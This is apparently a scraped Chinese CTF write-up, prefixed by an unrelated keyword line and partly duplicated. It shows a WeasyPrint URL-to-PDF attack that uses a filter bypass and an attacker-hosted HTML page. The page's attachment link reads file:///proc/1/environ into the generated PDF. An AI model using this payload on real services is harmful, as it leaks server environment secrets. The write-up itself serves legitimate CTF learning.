php 网站开发的来源,3d建模素材网,wordpress 翻译失效,快速搭建网站 数据存储目录
前言
真亦假#xff0c;假亦真
CSDN_To_PDF V1.2 前言
感谢17#x1f474;没让我爆零 真亦假#xff0c;假亦真
直接getshell不行#xff0c;那就一波信息搜集呗#xff0c;先开dirsearch扫一下
扫的过程中先试试常规的robots.txt,www.zip,shell.phps,.git,.sv…目录
前言
真亦假假亦真
CSDN_To_PDF V1.2 前言
感谢17没让我爆零 真亦假假亦真
直接getshell不行那就一波信息搜集呗先开dirsearch扫一下
扫的过程中先试试常规的robots.txt,www.zip,shell.phps,.git,.svn还有抓包看响应头响应体均无果最后扫出来是个/flag乐 愉快地访问/flag即可 CSDN_To_PDF V1.2
参考题目[BUUCTF][FireshellCTF2020]URL TO PDF-CSDN博客 先随便试试
http://124.222.136.33:1337/1.hthtmlml#https://blog.csdn.net/Jayjay___/article/details/136978668
成功收到请求注意到UA是WeasyPrint WeasyPrint是一个开源的HTML/CSS到PDF转换工具它允许用户使用标准的Web技术HTML和CSS创建PDF文档。WeasyPrint能够解析HTML和CSS并将其转换为可打印的PDF格式支持诸如排版、布局、字体处理等功能。它是一个功能强大且灵活的工具常用于生成报告、文档、电子书等需要打印或分享的内容。WeasyPrint是基于Python开发的并且可以通过命令行或Python API进行使用。 vps上挂1.html
!DOCTYPE html
html langen
headmeta charsetUTF-8
/head
body
link relattachment hreffile:///proc/1/environ
/body
/html
payload:
http://124.222.136.33:1337/1.hthtmlml#https://blog.csdn.net/Jayjay___/article/details/136978668 下载拿到ouput.pdf但是直接打开是不行的 用binwalk来打开文件 拿到flag
